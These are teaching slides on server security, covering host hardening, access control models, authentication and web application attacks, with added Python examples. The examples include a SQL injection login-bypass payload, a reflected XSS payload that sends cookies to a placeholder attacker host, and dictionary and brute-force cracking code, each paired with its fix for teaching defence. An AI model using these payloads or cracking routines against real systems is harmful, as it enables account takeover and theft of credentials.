Info Security Technology

Topic 3
Server Security

References

• Security+ Guide to Network Security Fundamentals, Third Edition; Mark Ciampa.
  – Chapter 5: Host Security (pp. 161-181)
  – Chapter 9: Access Control (pp. 331-344)
  – Chapter 10: Authentication (pp. 365-382)
  – Chapter 3: Web Application Attacks (pp. 87-89)
Objectives

• List the steps for securing a host computer
• Define access control
• Describe authentication credentials
• Explain Web application attacks
Server Room

• DNS server
• Web server
• Application server
• Email server
• Database server
• File server
Securing the Host

• Securing the host involves:
  a) Protecting the physical device
     • Controlling physical access to equipment
     • Securing the equipment itself
  b) Securing the operating system software
     • Five-step process
  c) Using security-based software applications
     • Anti-virus, anti-spam, pop-up blockers, firewall
Protecting the physical device

• Prevent unauthorized physical access to equipment
• Secure the equipment itself, especially portable devices
Physical Access

Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore.

• Oh, the things a bad guy can do if he can lay his hands on your computer! Here's a sampling, going from Stone Age to Space Age:
  – He could mount the ultimate low-tech denial of service attack, and smash your computer with a sledgehammer.
  – He could unplug the computer, haul it out of your building, and hold it for ransom.
  – He could boot the computer from a floppy disk, and reformat your hard drive. But wait, you say, I've configured the BIOS on my computer to prompt for a password when I turn the power on. No problem – if he can open the case and get his hands on the system hardware, he could just replace the BIOS chips. (Actually, there are even easier ways).
  – He could remove the hard drive from your computer, install it into his computer, and read it.
  – He could make a duplicate of your hard drive and take it back to his lair. Once there, he'd have all the time in the world to conduct brute-force attacks, such as trying every possible logon password. Programs are available to automate this and, given enough time, it's almost certain that he would succeed.
  – He could replace your keyboard with one that contains a radio transmitter. He could then monitor everything you type, including your password.

Reference: 10 Immutable Laws of Security (by Microsoft)
Physical Access

• Physical access control includes
  – Hardware locks
  – Proximity readers
  – Access lists
  – Mantraps
  – Video surveillance
  – Fencing
Secure Equipment

• Portable devices have a steel bracket security slot for a cable lock
• Notebooks may be placed in a safe
• Locking cabinets

(Figures: cable lock, safe, locking cabinet)
Securing the operating system software

Five-step process for protecting the operating system:
1. Develop the security policy
2. Perform host software baselining
3. Configure operating system security and settings
4. Deploy the settings
5. Implement patch management
Develop the security policy

Most organizations have security policies covering:
• Acceptable use
• Anti-virus
• Password management
• E-mail and retention
• Wireless communication
• Disposal and destruction
Perform host software baselining

• A baseline is a checklist against which an operating system can be evaluated, so that the security configuration is both effective and consistent across hosts.

• Microsoft Baseline Security Analyzer (MBSA) performed an audit of a Windows operating system to reveal security weaknesses and recommend settings for hardening it. (MBSA has since been retired by Microsoft; the checks it ran are still the right questions to ask of any host, whatever tool is current.)

• Some of the checks that MBSA performed:
  – Check for missing security updates
  – Check the file system type on hard drives (NTFS supports permissions; FAT does not)
  – Check if the Guest account is enabled
  – Check the number of local Administrator accounts
  – Check for blank or simple local user account passwords
  – Check if unnecessary services are running
Configure security and settings

• Steps to configure security and settings:
  1. Change insecure default settings:
     • Restrict permissions on files and directories
     • Remove guest accounts
     • Apply password guidelines
  2. Eliminate unnecessary software, devices, services and protocols
  3. Enable security features such as the Windows Firewall
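The baselining and configuration steps above are a checklist; here is what running such a checklist looks like in code. This is an added example for this topic, not code from the slides and not an MBSA module. It audits constructed host state (a fake shadow file, an sshd_config fragment and a list of listening services, all embedded below) against a small baseline: blank passwords, an enabled guest account, root login over SSH, and services the server role does not need. On a real host the same checks would read /etc/shadow, /etc/ssh/sshd_config and the listening-socket list instead of these strings.

```python
"""Host software baseline check (added example; constructed inputs)."""

# Constructed /etc/shadow-style content with fake hashes.  Field 2 is the
# password hash: "" means no password is required, "!" or "*" means locked.
SHADOW = """root:$6$saltsalt$fakehash:19000:0:99999:7:::
guest::19000:0:99999:7:::
svc_backup:$6$abc$fakehash2:19000:0:99999:7:::
nobody:*:19000:0:99999:7:::
"""

# Constructed sshd_config fragment.
SSHD_CONFIG = """Port 22
# comment lines are ignored
PermitRootLogin yes
PasswordAuthentication yes
"""

# Constructed list of services found listening on the host.
LISTENING = ["sshd", "telnetd", "httpd", "rpcbind"]

# The baseline for this server role: the only services it may expose.
ALLOWED_SERVICES = {"sshd", "httpd"}


def parse_shadow(text):
    """Return {account: password_field} from shadow-style lines."""
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            accounts[fields[0]] = fields[1]
    return accounts


def check_blank_passwords(text):
    """An empty password field lets anyone log in as that account with no password."""
    return [f"blank password: {acct}"
            for acct, pw in parse_shadow(text).items() if pw == ""]


def check_guest_account(text):
    """The baseline says the guest account must not exist, or at least be locked."""
    accounts = parse_shadow(text)
    if "guest" in accounts and not accounts["guest"].startswith(("!", "*")):
        return ["guest account enabled"]
    return []


def parse_sshd_config(text):
    """Return {Keyword: value}, ignoring comments and blank lines; last value wins."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            key, _, value = line.partition(" ")
            settings[key] = value.strip()
    return settings


def check_sshd(text):
    """Two common insecure-default findings for an Internet-facing server."""
    s = parse_sshd_config(text)
    findings = []
    if s.get("PermitRootLogin", "").lower() == "yes":
        findings.append("sshd: PermitRootLogin yes")
    if s.get("PasswordAuthentication", "yes").lower() == "yes":
        findings.append("sshd: PasswordAuthentication yes (prefer keys)")
    return findings


def check_services(listening, allowed):
    """Anything listening that the role does not need is attack surface to remove."""
    return [f"unnecessary service: {svc}" for svc in listening if svc not in allowed]


def run_baseline(shadow=SHADOW, sshd=SSHD_CONFIG, listening=LISTENING,
                 allowed=ALLOWED_SERVICES):
    """Run every check and return the list of findings (empty list = compliant)."""
    return (check_blank_passwords(shadow) + check_guest_account(shadow)
            + check_sshd(sshd) + check_services(listening, allowed))


if __name__ == "__main__":
    for finding in run_baseline():
        print("FAIL:", finding)
```

Each check returns a list of findings rather than printing, so the same functions can feed a report, a ticket, or a configuration-management tool that fixes the host; an empty list is the pass condition the "deploy the settings" step should converge every host to.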
Deploy the settings

• Deploy the settings
  – A security template is created and deployed to all computers
  – Use tools to automate the process for each computer (in a Windows domain, Group Policy)
  – In Windows, a security template is a collection of security configuration settings that includes the following:
    • Account policies
    • User rights
    • Event log settings
    • System services
    • File permissions
    • Registry permissions
Implement Patch Management

• To address vulnerabilities in operating systems that are uncovered after the software has been released, software vendors deploy software fixes:
  – Patch - A broadly released software security update intended to cover vulnerabilities that have been discovered
  – Hotfix - Addresses a specific customer situation; often not distributed outside that customer's organization
  – Service Pack - A cumulative package of all hotfixes, patches and updates
• Patch management means testing and applying these fixes promptly and verifying that they were installed; an unpatched server is exposed to every vulnerability that is already public. (Current Windows releases ship cumulative monthly updates instead of service packs, but the idea is the same.)
Using security-based software applications

• Anti-virus
• Anti-spam
• Pop-up blockers
• Firewall
Host based Firewall

• A host-based software firewall runs on the server itself
• Designed to prevent malicious packets from entering or leaving the computer
  – Monitors inbound and outbound traffic flowing through the computer
  – Connection attempts from unknown or unsolicited sources are identified and blocked
  – Can make the host invisible to port scans by not answering unsolicited probes
  – Complements, but does not replace, the network firewall: it still protects the host when the attacker is already on the local network
• Examples:
  – Windows 7 Firewall
  – ZoneAlarm Firewall
Access Control

Basic steps of access control
• Identification
  – Assigning an identity, such as a username, to a user accessing a computer system
• Authentication
  – Verifying the user's credentials to be sure they are who they claim to be and not an impostor. One way to authenticate is with a password.
• Authorization
  – Granting permission or the ability to access confidential information, such as a user being authorized to log in
• Granted access rights
  – Giving rights to certain services or applications in order to perform duties, such as a user being allowed to access specific data
Access Control

Access control model
– Provides a predefined framework for hardware and software developers who need to implement access control in their devices or applications
• There are four major access control models
  a. Mandatory Access Control
  b. Discretionary Access Control
  c. Role Based Access Control
  d. Rule Based Access Control
Mandatory Access Control

• Mandatory Access Control (MAC) model
  – The most restrictive model because all controls are fixed by policy
  – The owner and the security policy administrator (custodian) are responsible for managing access controls
  – The end user cannot implement, modify, or transfer any controls
  – Typically used in defense and military environments where it is vital to ensure that documents do not fall into the wrong hands
Discretionary Access Control

• Discretionary Access Control (DAC) model
  – The least restrictive model; the one used in a home environment
  – A user has total control over any resources that he or she owns
  – A user can also change the permissions of other users over those resources
  – The weakness is that any program a user runs has all of that user's rights. To limit this, operating systems such as macOS, UNIX-like systems and Windows 7 prompt the user before software is installed or elevated privileges are used; on Windows this is User Account Control (UAC)
Role Based Access Control

• Role Based Access Control (RBAC) model
  – Considered a more "real world" approach than the other models
  – Assigns permissions to particular roles in the organization, and then assigns end users to those roles
  – Users gain access to resources only through the roles they hold
  – Systems that implement some form of RBAC include Microsoft Active Directory, Microsoft SQL Server and Oracle DBMS
Rule Based Access Control

• Rule Based Access Control model (also abbreviated RBAC, not to be confused with Role Based)
  – Dynamically assigns access to users based on a set of rules defined by a custodian (security policy administrator)
  – Often used for managing user access to one or more systems
  • For example, permitting access for an account or group to a network connection only at certain hours of the day or days of the week
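The role based and rule based models above combine naturally: roles decide what a user may do, rules decide when. The following is an added example, not code from the slides or from any of the products named; the roles, users, permissions and the change-window rule are all made up for illustration, and the decision is deny-by-default.

```python
"""Role based + rule based access control (added example; constructed policy)."""
from datetime import datetime

# Role based: permissions are attached to roles, never directly to users.
ROLE_PERMS = {
    "dba":      {"db:read", "db:write", "db:admin"},
    "analyst":  {"db:read"},
    "helpdesk": {"user:reset_password"},
}

# Users are assigned roles; a user may hold several.
USER_ROLES = {
    "alice": {"dba"},
    "bob":   {"analyst", "helpdesk"},
}

# Rule based: the custodian adds conditions that apply regardless of role.
# A permission may only be used between the start hour (inclusive) and the
# end hour (exclusive) and on the listed weekdays (0 = Monday).
RULES = {
    "db:admin": {"hours": (8, 18), "days": {0, 1, 2, 3, 4}},  # change window only
}


def permissions_for(user):
    """Union of the permissions of every role the user holds (unknown user: none)."""
    perms = set()
    for role in USER_ROLES.get(user, set()):
        perms |= ROLE_PERMS.get(role, set())
    return perms


def rule_allows(permission, when):
    """True if no rule exists for the permission, or the rule is satisfied at `when`."""
    rule = RULES.get(permission)
    if rule is None:
        return True
    start, end = rule["hours"]
    return start <= when.hour < end and when.weekday() in rule["days"]


def is_authorized(user, permission, when=None):
    """Access decision: some role grants the permission AND every rule is satisfied."""
    when = when or datetime.now()
    if permission not in permissions_for(user):
        return False          # deny by default: no role grants it
    return rule_allows(permission, when)


if __name__ == "__main__":
    now = datetime(2024, 1, 10, 10, 0)       # a Wednesday morning
    print("alice db:admin in window:", is_authorized("alice", "db:admin", now))
    print("bob db:write:", is_authorized("bob", "db:write", now))
```

Note that removing a user from a role revokes everything that role granted in one step, which is the administrative advantage of RBAC over per-user permission lists; the rule layer then lets the custodian restrict even a legitimate role holder to a maintenance window without touching the role definitions.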
Authentication

Types of authentication methods
• What you know
  – Passwords, PINs, etc.
• What you have
  – NRIC, passport, OTP (one-time passwords)
• What you are
  – Biometrics: fingerprint, retina, face, voice, gait, etc.
Types of authentication methods

What a user knows
• Password
• PIN

Passwords
• Password
  – The most common logical access control
  – A secret combination of letters and numbers that only the user knows
  – A password should never be written down
  – Must also be of sufficient length and complexity so that an attacker cannot easily guess it
Attacks on passwords

• Social engineering
  – Includes phishing, shoulder surfing, dumpster diving
• Capturing
  – Includes keyloggers and protocol analyzers (sniffing)
• Resetting (physical access is required)
  – Boot from a CD or USB flash drive and reset the stored password
• Online guessing
  – Attacker attempts different passwords at the login prompt; rate limiting and account lockout slow this down
• Offline cracking
  – Attacker steals the file of hashed passwords and then breaks the hashes offline, where no lockout applies
Offline cracking of passwords

• Brute force attack
  – Trying every possible combination of characters until a hash matches; the cost grows exponentially with password length
• Dictionary attack
  – Hashes a list of likely words and compares the results against the hashes in the stolen password file
• Rainbow tables
  – Make password attacks faster by using a large pre-generated data set of hashes covering nearly every possible password combination, so most of the work is done once, before the file is even stolen
• Defence: store a random per-user salt with a slow, iterated hash (e.g. PBKDF2 or bcrypt), so precomputed tables do not apply and every guess costs the attacker real time
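To make the three offline attacks concrete, here is an added example (not code from the slides): a dictionary attack and a brute-force attack run against a constructed "stolen" file of unsalted SHA-256 hashes, followed by the same dictionary attack against hashes stored with a per-user random salt and PBKDF2. Every password, hash and wordlist entry below is made up; the point is the difference in work, not the specific values.

```python
"""Offline password cracking versus salted, iterated storage (added example)."""
import hashlib
import hmac
import itertools
import os
import string


def fast_hash(password):
    """Unsalted single SHA-256: the kind of storage rainbow tables are built for."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed "stolen password file": username -> unsalted hash.
STOLEN_UNSALTED = {
    "alice": fast_hash("letmein"),
    "bob":   fast_hash("Tr0ub4dor&3"),
    "carol": fast_hash("letmein"),      # same password -> identical hash, no salt
}

# Constructed tiny wordlist.
WORDLIST = ["password", "123456", "letmein", "qwerty", "welcome"]


def dictionary_attack(stolen, wordlist):
    """Hash each word once and look it up against every stolen hash.
    Without salt, one hash computation tests a word against all users at once."""
    table = {fast_hash(w): w for w in wordlist}          # what a rainbow table stores
    return {user: table[h] for user, h in stolen.items() if h in table}


def brute_force(target, alphabet=string.ascii_lowercase, max_len=3):
    """Try every string up to max_len; work grows as len(alphabet) ** length."""
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            candidate = "".join(chars)
            if fast_hash(candidate) == target:
                return candidate
    return None


def store_password(password, iterations=200_000):
    """Hardened storage: random 16-byte salt + PBKDF2-HMAC-SHA256 with many rounds."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return (salt, iterations, digest)


def verify_password(password, record):
    """Recompute with the stored salt and rounds; constant-time compare."""
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def salted_dictionary_attack(records, wordlist):
    """Against salted hashes the attacker must redo every guess per user, at the
    full PBKDF2 cost each time; nothing can be precomputed before the theft."""
    cracked = {}
    for user, record in records.items():
        for word in wordlist:
            if verify_password(word, record):
                cracked[user] = word
                break
    return cracked


if __name__ == "__main__":
    print("unsalted:", dictionary_attack(STOLEN_UNSALTED, WORDLIST))
    print("brute force 'abc':", brute_force(fast_hash("abc")))
    salted = {u: store_password(p) for u, p in [("alice", "letmein"), ("bob", "Tr0ub4dor&3")]}
    print("salted:", salted_dictionary_attack(salted, WORDLIST))
```

Salting does not stop a weak password from being guessed (alice's "letmein" still falls to the wordlist), but it removes the "one hash tests all users" shortcut and makes rainbow tables worthless, and the iteration count turns each guess from nanoseconds into milliseconds. Length is what defeats brute force: the alphabet-to-the-power-of-length loop in brute_force is exactly why the slides insist on sufficient length.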
Types of authentication methods

What a user has
• NRIC, passport
• OTP (one-time passwords)
  – Methods of generating
    • Time-synchronised
    • Challenge-based
  – Methods of distributing
    • Over SMS to a mobile phone (the weakest option: the code can be intercepted or the phone number hijacked)
    • On proprietary hardware tokens
Types of authentication methods

What a user is
• Standard biometrics
  • Fingerprint
  • Retina
  • Face
• Behavioral biometrics
  • Keystroke dynamics
  • Voice recognition
  • Computer footprinting
  • Gait (pattern of movement)
• Cognitive biometrics
  • Memorable events
  • Identifying specific faces (http://www.passfaces.com/personal/)
Single and multi-factor authentication

• One-factor authentication
  – Using only one authentication credential
• Multi-factor authentication
  – Enhances security, but only if the credentials come from different categories (for example a password plus a hardware token); two credentials of the same kind, such as a password and a PIN, are still single-factor
Web Application Attacks

• Web applications are an essential element of organizations today
• The web browser makes a request using HTTP to a web server, which may be connected to an application server

(Figure: web application infrastructure)
Web Application Attacks

• The following traditional security measures are not sufficient on their own
  – Hardening the server operating system
  – Protecting the network
• By design, the web server must process HTTP and therefore needs port 80 (and 443 for HTTPS) open to browsers
• Network devices such as routers and firewalls must also be configured to allow HTTP traffic to reach the web server
• An attack that arrives as a well-formed HTTP request passes straight through these controls, so the application itself must validate what it receives

(Figure: web application security)
Web Application Attacks

• Common web application attacks
  – SQL injection
  – Cross site scripting
  – XML injection
SQL injection

• Hinges on an attacker being able to enter an SQL database query (or a fragment of one) into a dynamic Web page
• SQL (Structured Query Language)
  – A language used to view and manipulate data that is stored in a relational database
How SQL injection works?

The login page builds its query by string concatenation (VB.NET-style code from the slide, with its stray quote characters fixed):

strSQL = "SELECT * FROM UserTable WHERE UserID='" & tb_userid.Text & "' AND Pword='" & tb_pword.Text & "'"

If the attacker types    ' or 1=1 ; --    into the UserID field, the string sent to the database becomes:

SELECT * FROM UserTable WHERE UserID='' or 1=1 ; -- ' AND Pword='anything'

-- means comment: everything after it, including the password check, is ignored, and 1=1 is always true, so the query matches every row.
SQL injection

• Variations of the SQL injection attack
  – Deleting data from the database
  – Accessing the host operating system through function calls
  – Retrieving a list of all usernames and passwords
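The slide's strSQL bug and the "retrieve all usernames and passwords" variation can be reproduced end to end against a local database. This is an added example, not the slide's code: it builds an in-memory SQLite UserTable (constructed accounts, plaintext Pword column only to mirror the slide), runs the concatenated query beside its parameterised replacement, and uses the slide's payload minus the trailing ";" because the sqlite3 driver executes one statement per call.

```python
"""SQL injection against the slide's login query, and the fix (added example)."""
import sqlite3


def setup_db():
    """Constructed UserTable with two accounts (not a real application)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (UserID TEXT, Pword TEXT)")
    conn.executemany("INSERT INTO UserTable VALUES (?, ?)",
                     [("admin", "S3cret!"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, userid, pword):
    """Builds the WHERE clause by string concatenation, exactly as strSQL does.
    Returns the matching rows: with the payload that is every user and password."""
    sql = (f"SELECT UserID, Pword FROM UserTable "
           f"WHERE UserID='{userid}' AND Pword='{pword}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, userid, pword):
    """Parameterised query: the SQL text is fixed and the values travel separately,
    so the quote and the '--' in a payload are data, never syntax."""
    sql = "SELECT UserID, Pword FROM UserTable WHERE UserID=? AND Pword=?"
    return conn.execute(sql, (userid, pword)).fetchall()


# The slide's payload without its trailing ';' (the comment alone is enough to
# cut off the password check).
PAYLOAD = "' OR 1=1 --"


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, payload:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe, payload:      ", login_safe(db, PAYLOAD, "anything"))
```

Parameterisation fixes the class of bug, not just this payload; input filtering of quote characters alone does not, because numeric fields, LIKE clauses and second-order injection all bypass it. Storing passwords as plaintext, as UserTable does here, is a separate defect the earlier password slides already cover.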
Hardening Web Servers

Cross Site Scripting

• An attack in which malicious code is inserted into a dynamic Web page
• Typically involves client-side scripts written in JavaScript
• Often designed to extract information from the victim and then pass the information to the attacker
• Targets Web sites that dynamically generate pages which redisplay (echo) user input that has not been properly validated or encoded
Cross Site Scripting

• Cross Site Scripting (XSS) attack steps
  – An attacker searches for a Web site that is vulnerable to XSS
    • E.g. an echoed response such as a "bad login" message that repeats the username
  – The attacker then creates an attack URL that contains the embedded JavaScript commands, e.g.
    http://www.123.com/login.asp?id=<script …
  – A fake e-mail is sent to unsuspecting users with the attack URL as a modified embedded link in the e-mail
  – The unsuspecting victim clicks on the attack URL
  – The JavaScript runs in the victim's browser in the context of the vulnerable site, extracts the victim's cookie and sends it to the attacker's site
• This variant is reflected XSS. The fix is to HTML-encode user input before echoing it; marking the session cookie HttpOnly stops script from reading it, but does not remove the XSS itself
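The echoed "bad login" page and the attack URL above can be modelled in a few lines. This is an added example, not code from the slides: the payload, the id parameter, the host attacker.example and the page template are all constructed to match the slide's description, and the vulnerable renderer is shown beside the output-encoded one.

```python
"""Reflected XSS through an echoed login parameter, and output encoding (added example)."""
from html import escape
from urllib.parse import parse_qs, quote, urlparse

# The JavaScript the attacker embeds: read document.cookie and send it to the
# attacker's site by loading an image from there (attacker.example is a placeholder).
PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
           "+document.cookie</script>")

# Attack URL in the shape of the slide's example: the id parameter carries the script.
ATTACK_URL = "http://www.123.com/login.asp?id=" + quote(PAYLOAD, safe="")


def id_param(url):
    """What the server sees after the browser sends the URL: the decoded id value."""
    return parse_qs(urlparse(url).query).get("id", [""])[0]


def render_vulnerable(user_id):
    """Failed-login page that echoes the raw input: the browser executes the script."""
    return f"<p>Bad login for user {user_id}</p>"


def render_safe(user_id):
    """Same page with output encoding: <, >, &, ' and " become entities, so the
    payload is displayed as text and is never parsed as a tag."""
    return f"<p>Bad login for user {escape(user_id, quote=True)}</p>"


def has_active_script(html):
    """Crude detector used to compare the two renderings: is there a live <script> tag?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    value = id_param(ATTACK_URL)
    print("vulnerable:", render_vulnerable(value))
    print("safe:      ", render_safe(value))
```

Encoding must happen at output, for the context the value lands in (an HTML attribute or a JavaScript string needs different escaping than element text); validating the input at login time is worthwhile but is not what stops the browser from treating echoed data as markup.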
XML injection

• Similar to a SQL injection attack
• Attackers inject XML tags and data into an XML document or XML-based data store that the application builds from unvalidated user input
Summary

• Securing the server involves physical access control to limit access to computer equipment by unauthorized users and hardening the operating system to resist attacks.
• Access control is the process by which resources or services are granted or denied. Four major access control models exist.
• Authentication credentials can be classified into three categories: what you know, what you have, and what you are.
• Web servers are prime targets for attackers.